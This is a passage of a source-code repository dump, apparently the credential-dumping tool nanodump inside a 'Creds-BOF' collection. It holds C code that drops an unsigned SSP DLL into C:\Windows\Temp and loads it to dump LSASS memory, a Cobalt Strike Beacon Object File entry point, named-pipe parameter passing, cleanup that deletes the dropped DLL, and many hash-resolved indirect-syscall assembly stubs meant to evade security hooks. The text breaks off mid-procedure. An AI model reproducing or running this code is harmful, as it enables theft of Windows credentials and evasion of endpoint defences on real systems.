    }
#else
{
    if (status == SEC_E_SECPKG_NOT_FOUND)
    {
        return 0;
    }
    else
    {
        return 1;
    }
}
#endif
}

BOOL write_dll(
    IN unsigned char nanodump_ssp_dll[],
    IN unsigned int nanodump_ssp_dll_len,
    IN LPSTR write_dll_path,
    IN LPSTR load_path,
    OUT LPSTR* random_dll_path)
{
    BOOL ret_val = FALSE;
    BOOL success = FALSE;

    // if the user did not specify a pre-existing DLL, write our own
    if (!load_path)
    {
        // fair OPSEC warning
        PRINT_ERR("[!] Writing an unsigned DLL to disk");

        if (!write_dll_path)
        {
            success = generate_random_dll_path(random_dll_path);
            if (!success)
                goto cleanup;

            write_dll_path = *random_dll_path;

            DPRINT("generated random dll path: %s", write_dll_path);
        }

        success = write_ssp_dll(
            write_dll_path,
            nanodump_ssp_dll,
            nanodump_ssp_dll_len);
        if (!success)
            goto cleanup;
    }

    ret_val = TRUE;

cleanup:
    return ret_val;
}

VOID run_technique(
    IN unsigned char nanodump_ssp_dll[],
    IN unsigned int nanodump_ssp_dll_len,
    IN LPSTR write_dll_path,
    IN LPSTR load_path,
    IN LPSTR dump_path,
    IN BOOL use_valid_sig)
{
    BOOL   success         = FALSE;
    LPSTR  random_dll_path = NULL;
    LPSTR  final_path      = NULL;
    BOOL   dump_worked     = FALSE;
    HANDLE hThread         = NULL;
    DWORD  dwThreadId      = 0;

    CreateThread_t CreateThread = NULL;

    // first of all, write the SSP DLL in the filesystem

    success = write_dll(
        nanodump_ssp_dll,
        nanodump_ssp_dll_len,
        write_dll_path,
        load_path,
        &random_dll_path);
    if (!success)
        goto cleanup;

    if (write_dll_path)
        final_path = write_dll_path;
    else if (load_path)
        final_path = load_path;
    else
        final_path = random_dll_path;

#if !defined(PASS_PARAMS_VIA_NAMED_PIPES) || PASS_PARAMS_VIA_NAMED_PIPES == 0
    // if we are not going to pass parameters to the DLL, simply load it and exit
    load_ssp(final_path);
#else
    // we are going to pass parametesr to the DLL, so we will load it on a separate thread and
    // pass the parameters via a named pipe


    CreateThread = (CreateThread_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        CreateThread_SW2_HASH,
        0);
    if (!CreateThread)
    {
        api_not_found("CreateThread");
        goto cleanup;
    }

    // load the SSP library in a thread because it will lock otherwise
    hThread = CreateThread(NULL, 0, load_ssp, final_path, 0, &dwThreadId);

    success = send_parameters_and_get_result(
        dump_path,
        use_valid_sig,
        &dump_worked);
    if (!success)
        goto cleanup;

    if (dump_worked)
    {
        print_success(
            dump_path,
            use_valid_sig,
            TRUE);
    }
    else
    {
        PRINT_ERR("The dump was not created");
    }
#endif

cleanup:
#if PASS_PARAMS_VIA_NAMED_PIPES == 1
    if (hThread)
        NtClose(hThread);
#endif
    if (write_dll_path)
        delete_file(write_dll_path);
    if (random_dll_path)
    {
        delete_file(random_dll_path);
        intFree(random_dll_path);
    }
}

#if defined(BOF)

#include "ssp_utils.c"
#include "../utils.c"
#include "../syscalls.c"
#include "../dinvoke.c"
#if PASS_PARAMS_VIA_NAMED_PIPES == 1
#include "../pipe.c"
#endif

void go(char* args, int length)
{
    datap          parser               = { 0 };
    unsigned char* nanodump_ssp_dll     = NULL;
    int            nanodump_ssp_dll_len = 0;
    LPSTR          write_dll_path       = NULL;
    LPSTR          load_path            = NULL;
    LPSTR          dump_path            = NULL;
    BOOL           use_valid_sig        = FALSE;

    BeaconDataParse(&parser, args, length);
    nanodump_ssp_dll = (unsigned char*)BeaconDataExtract(&parser, &nanodump_ssp_dll_len);
    write_dll_path = BeaconDataExtract(&parser, NULL);
    load_path = BeaconDataExtract(&parser, NULL);
#if PASS_PARAMS_VIA_NAMED_PIPES == 1
    /*
     * only parse parameters if PASS_PARAMS_VIA_NAMED_PIPES is enabled
     * if not, the hardcoded options in NanoDumpSSP will be used
     */
    dump_path = BeaconDataExtract(&parser, NULL);
    use_valid_sig = (BOOL)BeaconDataInt(&parser);
#endif

    if (!write_dll_path[0])
        write_dll_path = NULL;
    if (!load_path[0])
        load_path = NULL;

    run_technique(
        nanodump_ssp_dll,
        nanodump_ssp_dll_len,
        write_dll_path,
        load_path,
        dump_path,
        use_valid_sig);
}

#endif

#if defined(EXE)

#ifdef _WIN64
 #include "nanodump_ssp_dll.x64.h"
#else
 #include "nanodump_ssp_dll.x86.h"
#endif

#if PASS_PARAMS_VIA_NAMED_PIPES == 1

void usage(char* procname)
{
    PRINT("usage: %s --write C:\\Windows\\Temp\\doc.docx [--valid] [--write-dll C:\\Windows\\Temp\\ssp.dll] [--load-dll C:\\Windows\\Temp\\ssp.dll] [--help]", procname);
    PRINT("Dumpfile options:");
    PRINT("    --write DUMP_PATH, -w DUMP_PATH");
    PRINT("            filename of the dump");
    PRINT("    --valid, -v");
    PRINT("            create a dump with a valid signature");
    PRINT("SSP DLL options:");
    PRINT("    --write-dll, -wdll");
    PRINT("            path where to write the SSP DLL from nanodump (randomly generated if not defined)");
    PRINT("    --load-dll, -ldll");
    PRINT("            load an existing SSP DLL");
    PRINT("Help:");
    PRINT("    --help, -h");
    PRINT("            print this help message and leave");
}

int main(int argc, char* argv[])
{
    LPSTR dump_path        = NULL;
    BOOL  use_valid_sig    = FALSE;
    LPSTR write_dll_path   = NULL;
    LPSTR load_path        = NULL;

    for (int i = 1; i < argc; ++i)
    {
        if (!strncmp(argv[i], "-v", 3) ||
            !strncmp(argv[i], "--valid", 8))
        {
            use_valid_sig = TRUE;
        }
        else if (!strncmp(argv[i], "-w", 3) ||
                 !strncmp(argv[i], "--write", 8))
        {
            if (i + 1 >= argc)
            {
                PRINT("missing --write value");
                return 0;
            }
            dump_path = argv[++i];
        }
        else if (!strncmp(argv[i], "-wdll", 6) ||
                 !strncmp(argv[i], "--write-dll", 12))
        {
            if (i + 1 >= argc)
            {
                PRINT("missing --write-dll value");
                return 0;
            }
            write_dll_path = argv[++i];
        }
        else if (!strncmp(argv[i], "-ldll", 6) ||
                 !strncmp(argv[i], "--load-dll", 11))
        {
            if (i + 1 >= argc)
            {
                PRINT("missing --load value");
                return 0;
            }
            load_path = argv[++i];
        }
        else if (!strncmp(argv[i], "-h", 3) ||
                 !strncmp(argv[i], "--help", 7))
        {
            usage(argv[0]);
            return 0;
        }
        else
        {
            PRINT("invalid argument: %s", argv[i]);
            return 0;
        }
    }

    if (!dump_path)
    {
        PRINT("You need to provide the --write parameter");
        return 0;
    }

    if (!is_full_path(dump_path))
    {
        PRINT("You need to provide the full path: %s", dump_path);
        return 0;
    }

    if (load_path && write_dll_path)
    {
        PRINT("The options --write-dll and --load-dll cannot be used together");
        return 0;
    }

    run_technique(
        nanodump_ssp_dll,
        nanodump_ssp_dll_len,
        write_dll_path,
        load_path,
        dump_path,
        use_valid_sig);

    return 0;
}

#else // #if PASS_PARAMS_VIA_NAMED_PIPES == 1

void usage(char* procname)
{
    PRINT("usage: %s [--write-dll C:\\Windows\\Temp\\ssp.dll] [--load-dll C:\\Windows\\Temp\\ssp.dll] [--help]", procname);
    PRINT("SSP DLL options:");
    PRINT("    --write-dll, -wdll");
    PRINT("            path where to write the SSP DLL from nanodump (randomly generated if not defined)");
    PRINT("    --load-dll, -ldll");
    PRINT("            load an existing SSP DLL");
    PRINT("Help:");
    PRINT("    --help, -h");
    PRINT("            print this help message and leave");
}

int main(int argc, char* argv[])
{
    LPSTR write_dll_path   = NULL;
    LPSTR load_path        = NULL;

    for (int i = 1; i < argc; ++i)
    {
        if (!strncmp(argv[i], "-wdll", 6) ||
                 !strncmp(argv[i], "--write-dll", 12))
        {
            if (i + 1 >= argc)
            {
                PRINT("missing --write-dll value");
                return 0;
            }
            write_dll_path = argv[++i];
        }
        else if (!strncmp(argv[i], "-ldll", 6) ||
                 !strncmp(argv[i], "--load-dll", 11))
        {
            if (i + 1 >= argc)
            {
                PRINT("missing --load value");
                return 0;
            }
            load_path = argv[++i];
        }
        else if (!strncmp(argv[i], "-h", 3) ||
                 !strncmp(argv[i], "--help", 7))
        {
            usage(argv[0]);
            return 0;
        }
        else
        {
            PRINT("invalid argument: %s", argv[i]);
            return 0;
        }
    }

    if (load_path && write_dll_path)
    {
        PRINT("The options --write-dll and --load-dll cannot be used together");
        return 0;
    }

    run_technique(
        nanodump_ssp_dll,
        nanodump_ssp_dll_len,
        write_dll_path,
        load_path,
        NULL,
        FALSE);

    return 0;
}

#endif // #if PASS_PARAMS_VIA_NAMED_PIPES == 1

#endif // defined(EXE)


================================================
FILE: Creds-BOF/nanodump/source/ssp/ssp_utils.c
================================================
#include "ssp/ssp_utils.h"
#include "utils.h"
#include "pipe.h"

BOOL generate_random_dll_path(
    OUT LPSTR* random_path)
{
    BOOL    ret_val   = FALSE;
    LPSTR   rand_path = NULL;
    ULONG32 rand_num  = 0;
    CHAR    c         = 0;

    // intializes the random number generator
    time_t t;
    srand((unsigned) time(&t));

    rand_path = intAlloc(MAX_PATH + 1);
    if (!rand_path)
    {
        malloc_failed();
        goto cleanup;
    }

    strncpy(rand_path, "C:\\Windows\\Temp\\", MAX_PATH);

    for (int i = 0; i < DLL_NAME_LENGTH; ++i)
    {
        rand_num = rand() % 52;
        if (rand_num < 26)
            c = 97 + rand_num;
        else
            c = 65 - 26 + rand_num;
        rand_path[16 + i] = c;
    }

    // the extension does not need to be '.dll'
    strncat(rand_path, ".txt", MAX_PATH);

    *random_path = rand_path;

    ret_val = TRUE;

cleanup:
    if (!ret_val && rand_path)
        intFree(rand_path);
    if (!ret_val)
        *random_path = NULL;

    return ret_val;
}

BOOL write_ssp_dll(
    IN LPSTR ssp_dll_path,
    IN unsigned char nanodump_ssp_dll[],
    IN unsigned int nanodump_ssp_dll_len)
{
    BOOL           ret_val              = FALSE;
    BOOL           success              = FALSE;
    WCHAR          wcFilePath[MAX_PATH] = { 0 };
    UNICODE_STRING file_path            = { 0 };

    file_path.Buffer        = wcFilePath;
    file_path.Length        = 0;
    file_path.MaximumLength = 0;

    get_full_path(&file_path, ssp_dll_path);

    success = write_file(
        &file_path,
        nanodump_ssp_dll,
        nanodump_ssp_dll_len);
    if (!success)
    {
        PRINT_ERR("Failed to write the DLL to %s", ssp_dll_path);
        goto cleanup;
    }

    ret_val = TRUE;

cleanup:
    return ret_val;
}

#if PASS_PARAMS_VIA_NAMED_PIPES == 1

BOOL send_parameters_and_get_result(
    IN LPSTR dump_path,
    IN BOOL use_valid_sig,
    OUT PBOOL dump_worked)
{
    BOOL   ret_val = FALSE;
    BOOL   success = FALSE;
    HANDLE hPipe   = NULL;

    Sleep_t Sleep = NULL;

    Sleep = (Sleep_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        Sleep_SW2_HASH,
        0);
    if (!Sleep)
    {
        api_not_found("Sleep");
        goto cleanup;
    }

    for (int i = 0; i < 5; ++i)
    {
        // let's try to connect to the named pipe
        success = client_connect_to_named_pipe(
            IPC_PIPE_NAME,
            &hPipe);
        if (!success)
        {
            // sleep half a second and try again
            if (i != 4)
            {
                DPRINT("could not connnect to the named pipe, sleeping and trying again...");
            }
            Sleep(500);
            continue;
        }
        break;
    }

    if (!success)
    {
        PRINT_ERR("Could not connect to the named pipe, the DLL does not seem to have been loaded");
        goto cleanup;
    }

    success = client_send_arguments_from_pipe(
        hPipe,
        dump_path,
        use_valid_sig,
        FALSE);
    if (!success)
        goto cleanup;

    success = client_recv_success(
        hPipe,
        dump_worked);
    if (!success)
        goto cleanup;

    ret_val = TRUE;

cleanup:
    if (hPipe)
        NtClose(hPipe);

    return ret_val;
}

#endif


================================================
FILE: Creds-BOF/nanodump/source/syscalls-asm.asm
================================================
.code

EXTERN SW3_GetSyscallAddress: PROC
EXTERN SW2_GetSyscallNumber: PROC

SyscallNotFound PROC
	mov eax, 0C0000225h
	ret
SyscallNotFound ENDP

local_is_wow64 PROC
	mov rax, 0
	ret
local_is_wow64 ENDP

getIP PROC
	mov rax, [rsp]
	ret
getIP ENDP

NtOpenProcess PROC
	mov [rsp +8], rcx
	mov [rsp+16], rdx
	mov [rsp+24], r8
	mov [rsp+32], r9
	mov rcx, 0CD9B2A0Fh
	push rcx
	sub rsp, 028h
	call SW3_GetSyscallAddress
	add rsp, 028h
	pop rcx
	push rax
	sub rsp, 028h
	call SW2_GetSyscallNumber
	add rsp, 028h
	pop r11
	mov rcx, [rsp+8]
	mov rdx, [rsp+16]
	mov r8, [rsp+24]
	mov r9, [rsp+32]
	mov r10, rcx
	jmp r11
NtOpenProcess ENDP

NtGetNextProcess PROC
	mov [rsp +8], rcx
	mov [rsp+16], rdx
	mov [rsp+24], r8
	mov [rsp+32], r9
	mov rcx, 0FFBF1A2Fh
	push rcx
	sub rsp, 028h
	call SW3_GetSyscallAddress
	add rsp, 028h
	pop rcx
	push rax
	sub rsp, 028h
	call SW2_GetSyscallNumber
	add rsp, 028h
	pop r11
	mov rcx, [rsp+8]
	mov rdx, [rsp+16]
	mov r8, [rsp+24]
	mov r9, [rsp+32]
	mov r10, rcx
	jmp r11
NtGetNextProcess ENDP

NtReadVirtualMemory PROC
	mov [rsp +8], rcx
	mov [rsp+16], rdx
	mov [rsp+24], r8
	mov [rsp+32], r9
	mov rcx, 0118B7567h
	push rcx
	sub rsp, 028h
	call SW3_GetSyscallAddress
	add rsp, 028h
	pop rcx
	push rax
	sub rsp, 028h
	call SW2_GetSyscallNumber
	add rsp, 028h
	pop r11
	mov rcx, [rsp+8]
	mov rdx, [rsp+16]
	mov r8, [rsp+24]
	mov r9, [rsp+32]
	mov r10, rcx
	jmp r11
NtReadVirtualMemory ENDP

NtClose PROC
	mov [rsp +8], rcx
	mov [rsp+16], rdx
	mov [rsp+24], r8
	mov [rsp+32], r9
	mov rcx, 02252D33Fh
	push rcx
	sub rsp, 028h
	call SW3_GetSyscallAddress
	add rsp, 028h
	pop rcx
	push rax
	sub rsp, 028h
	call SW2_GetSyscallNumber
	add rsp, 028h
	pop r11
	mov rcx, [rsp+8]
	mov rdx, [rsp+16]
	mov r8, [rsp+24]
	mov r9, [rsp+32]
	mov r10, rcx
	jmp r11
NtClose ENDP

NtOpenProcessToken PROC
	mov [rsp +8], rcx
	mov [rsp+16], rdx
	mov [rsp+24], r8
	mov [rsp+32], r9
	mov rcx, 08FA915A2h
	push rcx
	sub rsp, 028h
	call SW3_GetSyscallAddress
	add rsp, 028h
	pop rcx
	push rax
	sub rsp, 028h
	call SW2_GetSyscallNumber
	add rsp, 028h
	pop r11
	mov rcx, [rsp+8]
	mov rdx, [rsp+16]
	mov r8, [rsp+24]
	mov r9, [rsp+32]
	mov r10, rcx
	jmp r11
NtOpenProcessToken ENDP

NtQueryInformationProcess PROC
	mov [rsp +8], rcx
	mov [rsp+16], rdx
	mov [rsp+24], r8
	mov [rsp+32], r9
	mov rcx, 0BDBCBC20h
	push rcx
	sub rsp, 028h
	call SW3_GetSyscallAddress
	add rsp, 028h
	pop rcx
	push rax
	sub rsp, 028h
	call SW2_GetSyscallNumber
	add rsp, 028h
	pop r11
	mov rcx, [rsp+8]
	mov rdx, [rsp+16]
	mov r8, [rsp+24]
	mov r9, [rsp+32]
	mov r10, rcx
	jmp r11
NtQueryInformationProcess ENDP

NtQueryVirtualMemory PROC
	mov [rsp +8], rcx
	mov [rsp+16], rdx
	mov [rsp+24], r8
	mov [rsp+32], r9
	mov rcx, 00393E980h
	push rcx
	sub rsp, 028h
	call SW3_GetSyscallAddress
	add rsp, 028h
	pop rcx
	push rax
	sub rsp, 028h
	call SW2_GetSyscallNumber
	add rsp, 028h
	pop r11
	mov rcx, [rsp+8]
	mov rdx, [rsp+16]
	mov r8, [rsp+24]
	mov r9, [rsp+32]
	mov r10, rcx
	jmp r11
NtQueryVirtualMemory ENDP

NtAdjustPrivilegesToken PROC
	mov [rsp +8], rcx
	mov [rsp+16], rdx
	mov [rsp+24], r8
	mov [rsp+32], r9
	mov rcx, 017AB1B32h
	push rcx
	sub rsp, 028h
	call SW3_GetSyscallAddress
	add rsp, 028h
	pop rcx
	push rax
	sub rsp, 028h
	call SW2_GetSyscallNumber
	add rsp, 028h
	pop r11
	mov rcx, [rsp+8]
	mov rdx, [rsp+16]
	mov r8, [rsp+24]
	mov r9, [rsp+32]
	mov r10, rcx
	jmp r11
NtAdjustPrivilegesToken ENDP

NtAllocateVirtualMemory PROC
	mov [rsp +8], rcx
	mov [rsp+16], rdx
	mov [rsp+24], r8
	mov [rsp+32], r9
	mov rcx, 00595031Bh
	push rcx
	sub rsp, 028h
	call SW3_GetSyscallAddress
	add rsp, 028h
	pop rcx
	push rax
	sub rsp, 028h
	call SW2_GetSyscallNumber
	add rsp, 028h
	pop r11
	mov rcx, [rsp+8]
	mov rdx, [rsp+16]
	mov r8, [rsp+24]
	mov r9, [rsp+32]
	mov r10, rcx
	jmp r11
NtAllocateVirtualMemory ENDP

NtFreeVirtualMemory PROC
	mov [rsp +8], rcx
	mov [rsp+16], rdx
	mov [rsp+24], r8
	mov [rsp+32], r9
	mov rcx, 001932F05h
	push rcx
	sub rsp, 028h
	call SW3_GetSyscallAddress
	add rsp, 028h
	pop rcx
	push rax
	sub rsp, 028h
	call SW2_GetSyscallNumber
	add rsp, 028h
	pop r11
	mov rcx, [rsp+8]
	mov rdx, [rsp+16]
	mov r8, [rsp+24]
	mov r9, [rsp+32]
	mov r10, rcx
	jmp r11
NtFreeVirtualMemory ENDP

NtCreateFile PROC
	mov [rsp +8], rcx
	mov [rsp+16], rdx
	mov [rsp+24], r8
	mov [rsp+32], r9
	mov rcx, 096018EB6h
	push rcx
	sub rsp, 028h
	call SW3_GetSyscallAddress
	add rsp, 028h
	pop rcx
	push rax
	sub rsp, 028h
	call SW2_GetSyscallNumber
	add rsp, 028h
	pop r11
	mov rcx, [rsp+8]
	mov rdx, [rsp+16]
	mov r8, [rsp+24]
	mov r9, [rsp+32]
	mov r10, rcx
	jmp r11
NtCreateFile ENDP

NtWriteFile PROC
	mov [rsp +8], rcx
	mov [rsp+16], rdx
	mov [rsp+24], r8
	mov [rsp+32], r9
	mov rcx, 024B22A1Ah
	push rcx
	sub rsp, 028h
	call SW3_GetSyscallAddress
	add rsp, 028h
	pop rcx
	push rax
	sub rsp, 028h
	call SW2_GetSyscallNumber
	add rsp, 028h
	pop r11
	mov rcx, [rsp+8]
	mov rdx, [rsp+16]
	mov r8, [rsp+24]
	mov r9, [rsp+32]
	mov r10, rcx
	jmp r11
NtWriteFile ENDP

NtCreateProcessEx PROC
	mov [rsp +8], rcx
	mov [rsp+16], rdx
	mov [rsp+24], r8
	mov [rsp+32], r9
	mov rcx, 01198E2E3h
	push rcx
	sub rsp, 028h
	call SW3_GetSyscallAddress
	add rsp, 028h
	pop rcx
	push rax
	sub rsp, 028h
	call SW2_GetSyscallNumber
	add rsp, 028h
	pop r11
	mov rcx, [rsp+8]
	mov rdx, [rsp+16]
	mov r8, [rsp+24]
	mov r9, [rsp+32]
	mov r10, rcx
	jmp r11
NtCreateProcessEx ENDP

NtQuerySystemInformation PROC
	mov [rsp +8], rcx
	mov [rsp+16], rdx
	mov [rsp+24], r8
	mov [rsp+32], r9
	mov rcx, 04A5B2C8Fh
	push rcx
	sub rsp, 028h
	call SW3_GetSyscallAddress
	add rsp, 028h
	pop rcx
	push rax
	sub rsp, 028h
	call SW2_GetSyscallNumber
	add rsp, 028h
	pop r11
	mov rcx, [rsp+8]
	mov rdx, [rsp+16]
	mov r8, [rsp+24]
	mov r9, [rsp+32]
	mov r10, rcx
	jmp r11
NtQuerySystemInformation ENDP

NtDuplicateObject PROC
	mov [rsp +8], rcx
	mov [rsp+16], rdx
	mov [rsp+24], r8
	mov [rsp+32], r9
	mov rcx, 09CBFA413h
	push rcx
	sub rsp, 028h
	call SW3_GetSyscallAddress
	add rsp, 028h
	pop rcx
	push rax
	sub rsp, 028h
	call SW2_GetSyscallNumber
	add rsp, 028h
	pop r11
	mov rcx, [rsp+8]
	mov rdx, [rsp+16]
	mov r8, [rsp+24]
	mov r9, [rsp+32]
	mov r10, rcx
	jmp r11
NtDuplicateObject ENDP

NtQueryObject_ PROC
	mov [rsp +8], rcx
	mov [rsp+16], rdx
	mov [rsp+24], r8
	mov [rsp+32], r9
	mov rcx, 00E23F64Fh
	push rcx
	sub rsp, 028h
	call SW3_GetSyscallAddress
	add rsp, 028h
	pop rcx
	push rax
	sub rsp, 028h
	call SW2_GetSyscallNumber
	add rsp, 028h
	pop r11
	mov rcx, [rsp+8]
	mov rdx, [rsp+16]
	mov r8, [rsp+24]
	mov r9, [rsp+32]
	mov r10, rcx
	jmp r11
NtQueryObject_ ENDP

NtWaitForSingleObject PROC
	mov [rsp +8], rcx
	mov [rsp+16], rdx
	mov [rsp+24], r8
	mov [rsp+32], r9
	mov rcx, 0426376E3h
	push rcx
	sub rsp, 028h
	call SW3_GetSyscallAddress
	add rsp, 028h
	pop rcx
	push rax
	sub rsp, 028h
	call SW2_GetSyscallNumber
	add rsp, 028h
	pop r11
	mov rcx, [rsp+8]
	mov rdx, [rsp+16]
	mov r8, [rsp+24]
	mov r9, [rsp+32]
	mov r10, rcx
	jmp r11
NtWaitForSingleObject ENDP

NtDeleteFile PROC
	mov [rsp +8], rcx
	mov [rsp+16], rdx
	mov [rsp+24], r8
	mov [rsp+32], r9
	mov rcx, 064B26A1Ah
	push rcx
	sub rsp, 028h
	call SW3_GetSyscallAddress
	add rsp, 028h
	pop rcx
	push rax
	sub rsp, 028h
	call SW2_GetSyscallNumber
	add rsp, 028h
	pop r11
	mov rcx, [rsp+8]
	mov rdx, [rsp+16]
	mov r8, [rsp+24]
	mov r9, [rsp+32]
	mov r10, rcx
	jmp r11
NtDeleteFile ENDP

NtTerminateProcess PROC
	mov [rsp +8], rcx
	mov [rsp+16], rdx
	mov [rsp+24], r8
	mov [rsp+32], r9
	mov rcx, 0652E64A0h
	push rcx
	sub rsp, 028h
	call SW3_GetSyscallAddress
	add rsp, 028h
	pop rcx
	push rax
	sub rsp, 028h
	call SW2_GetSyscallNumber
	add rsp, 028h
	pop r11
	mov rcx, [rsp+8]
	mov rdx, [rsp+16]
	mov r8, [rsp+24]
	mov r9, [rsp+32]
	mov r10, rcx
	jmp r11
NtTerminateProcess ENDP

NtSetInformationProcess_ PROC
	mov [rsp +8], rcx
	mov [rsp+16], rdx
	mov [rsp+24], r8
	mov [rsp+32], r9
	mov rcx, 01D9F320Ch
	push rcx
	sub rsp, 028h
	call SW3_GetSyscallAddress
	add rsp, 028h
	pop rcx
	push rax
	sub rsp, 028h
	call SW2_GetSyscallNumber
	add rsp, 028h
	pop r11
	mov rcx, [rsp+8]
	mov rdx, [rsp+16]
	mov r8, [rsp+24]
	mov r9, [rsp+32]
	mov r10, rcx
	jmp r11
NtSetInformationProcess_ ENDP

NtQueryInformationToken PROC
	mov [rsp +8], rcx
	mov [rsp+16], rdx
	mov [rsp+24], r8
	mov [rsp+32], r9
	mov rcx, 027917136h
	push rcx
	sub rsp, 028h
	call SW3_GetSyscallAddress
	add rsp, 028h
	pop rcx
	push rax
	sub rsp, 028h
	call SW2_GetSyscallNumber
	add rsp, 028h
	pop r11
	mov rcx, [rsp+8]
	mov rdx, [rsp+16]
	mov r8, [rsp+24]
	mov r9, [rsp+32]
	mov r10, rcx
	jmp r11
NtQueryInformationToken ENDP

NtDuplicateToken PROC
	mov [rsp +8], rcx
	mov [rsp+16], rdx
	mov [rsp+24], r8
	mov [rsp+32], r9
	mov rcx, 0099C8384h
	push rcx
	sub rsp, 028h
	call SW3_GetSyscallAddress
	add rsp, 028h
	pop rcx
	push rax
	sub rsp, 028h
	call SW2_GetSyscallNumber
	add rsp, 028h
	pop r11
	mov rcx, [rsp+8]
	mov rdx, [rsp+16]
	mov r8, [rsp+24]
	mov r9, [rsp+32]
	mov r10, rcx
	jmp r11
NtDuplicateToken ENDP

NtSetInformationThread PROC
	mov [rsp +8], rcx
	mov [rsp+16], rdx
	mov [rsp+24], r8
	mov [rsp+32], r9
	mov rcx, 01ABE5F87h
	push rcx
	sub rsp, 028h
	call SW3_GetSyscallAddress
	add rsp, 028h
	pop rcx
	push rax
	sub rsp, 028h
	call SW2_GetSyscallNumber
	add rsp, 028h
	pop r11
	mov rcx, [rsp+8]
	mov rdx, [rsp+16]
	mov r8, [rsp+24]
	mov r9, [rsp+32]
	mov r10, rcx
	jmp r11
NtSetInformationThread ENDP

NtCreateDirectoryObjectEx PROC
	mov [rsp +8], rcx
	mov [rsp+16], rdx
	mov [rsp+24], r8
	mov [rsp+32], r9
	mov rcx, 0BCBD62EAh
	push rcx
	sub rsp, 028h
	call SW3_GetSyscallAddress
	add rsp, 028h
	pop rcx
	push rax
	sub rsp, 028h
	call SW2_GetSyscallNumber
	add rsp, 028h
	pop r11
	mov rcx, [rsp+8]
	mov rdx, [rsp+16]
	mov r8, [rsp+24]
	mov r9, [rsp+32]
	mov r10, rcx
	jmp r11
NtCreateDirectoryObjectEx ENDP

NtCreateSymbolicLinkObject PROC
	mov [rsp +8], rcx
	mov [rsp+16], rdx
	mov [rsp+24], r8
	mov [rsp+32], r9
	mov rcx, 08AD1BA6Dh
	push rcx
	sub rsp, 028h
	call SW3_GetSyscallAddress
	add rsp, 028h
	pop rcx
	push rax
	sub rsp, 028h
	call SW2_GetSyscallNumber
	add rsp, 028h
	pop r11
	mov rcx, [rsp+8]
	mov rdx, [rsp+16]
	mov r8, [rsp+24]
	mov r9, [rsp+32]
	mov r10, rcx
	jmp r11
NtCreateSymbolicLinkObject ENDP

NtOpenSymbolicLinkObject PROC
	mov [rsp +8], rcx
	mov [rsp+16], rdx
	mov [rsp+24], r8
	mov [rsp+32], r9
	mov rcx, 08C97980Fh
	push rcx
	sub rsp, 028h
	call SW3_GetSyscallAddress
	add rsp, 028h
	pop rcx
	push rax
	sub rsp, 028h
	call SW2_GetSyscallNumber
	add rsp, 028h
	pop r11
	mov rcx, [rsp+8]
	mov rdx, [rsp+16]
	mov r8, [rsp+24]
	mov r9, [rsp+32]
	mov r10, rcx
	jmp r11
NtOpenSymbolicLinkObject ENDP

NtQuerySymbolicLinkObject PROC
	mov [rsp +8], rcx
	mov [rsp+16], rdx
	mov [rsp+24], r8
	mov [rsp+32], r9
	mov rcx, 0A63A8CA7h
	push rcx
	sub rsp, 028h
	call SW3_GetSyscallAddress
	add rsp, 028h
	pop rcx
	push rax
	sub rsp, 028h
	call SW2_GetSyscallNumber
	add rsp, 028h
	pop r11
	mov rcx, [rsp+8]
	mov rdx, [rsp+16]
	mov r8, [rsp+24]
	mov r9, [rsp+32]
	mov r10, rcx
	jmp r11
NtQuerySymbolicLinkObject ENDP

NtCreateSection PROC
	mov [rsp +8], rcx
	mov [rsp+16], rdx
	mov [rsp+24], r8
	mov [rsp+32], r9
	mov rcx, 0F06912F9h
	push rcx
	sub rsp, 028h
	call SW3_GetSyscallAddress
	add rsp, 028h
	pop rcx
	push rax
	sub rsp, 028h
	call SW2_GetSyscallNumber
	add rsp, 028h
	pop r11
	mov rcx, [rsp+8]
	mov rdx, [rsp+16]
	mov r8, [rsp+24]
	mov r9, [rsp+32]
	mov r10, rcx
	jmp r11
NtCreateSection ENDP

NtOpenThreadToken PROC
	mov [rsp +8], rcx
	mov [rsp+16], rdx
	mov [rsp+24], r8
	mov [rsp+32], r9
	mov rcx, 073A33918h
	push rcx
	sub rsp, 028h
	call SW3_GetSyscallAddress
	add rsp, 028h
	pop rcx
	push rax
	sub rsp, 028h
	call SW2_GetSyscallNumber
	add rsp, 028h
	pop r11
	mov rcx, [rsp+8]
	mov rdx, [rsp+16]
	mov r8, [rsp+24]
	mov r9, [rsp+32]
	mov r10, rcx
	jmp r11
NtOpenThreadToken ENDP

NtCreateTransaction PROC
	mov [rsp +8], rcx
	mov [rsp+16], rdx
	mov [rsp+24], r8
	mov [rsp+32], r9
	mov rcx, 07CAB5EFBh
	push rcx
	sub rsp, 028h
	call SW3_GetSyscallAddress
	add rsp, 028h
	pop rcx
	push rax
	sub rsp, 028h
	call SW2_GetSyscallNumber
	add rsp, 028h
	pop r11
	mov rcx, [rsp+8]
	mov rdx, [rsp+16]
	mov r8, [rsp+24]
	mov r9, [rsp+32]
	mov r10, rcx
	jmp r11
NtCreateTransaction ENDP

NtQueryInformationFile PROC
	mov [rsp +8], rcx
	mov [rsp+16], rdx
	mov [rsp+24], r8
	mov [rsp+32], r9
	mov rcx, 038985C1Eh
	push rcx
	sub rsp, 028h
	call SW3_GetSyscallAddress
	add rsp, 028h
	pop rcx
	push rax
	sub rsp, 028h
	call SW2_GetSyscallNumber
	add rsp, 028h
	pop r11
	mov rcx, [rsp+8]
	mov rdx, [rsp+16]
	mov r8, [rsp+24]
	mov r9, [rsp+32]
	mov r10, rcx
	jmp r11
NtQueryInformationFile ENDP

NtMakeTemporaryObject PROC
	mov [rsp +8], rcx
	mov [rsp+16], rdx
	mov [rsp+24], r8
	mov [rsp+32], r9
	mov rcx, 084DF4D82h
	push rcx
	sub rsp, 028h
	call SW3_GetSyscallAddress
	add rsp, 028h
	pop rcx
	push rax
	sub rsp, 028h
	call SW2_GetSyscallNumber
	add rsp, 028h
	pop r11
	mov rcx, [rsp+8]
	mov rdx, [rsp+16]
	mov r8, [rsp+24]
	mov r9, [rsp+32]
	mov r10, rcx
	jmp r11
NtMakeTemporaryObject ENDP

NtCreateKey PROC
	mov [rsp +8], rcx
	mov [rsp+16], rdx
	mov [rsp+24], r8
	mov [rsp+32], r9
	mov rcx, 0A1B2860Ch
	push rcx
	sub rsp, 028h
	call SW3_GetSyscallAddress
	add rsp, 028h
	pop rcx
	push rax
	sub rsp, 028h
	call SW2_GetSyscallNumber
	add rsp, 028h
	pop r11
	mov rcx, [rsp+8]
	mov rdx, [rsp+16]
	mov r8, [rsp+24]
	mov r9, [rsp+32]
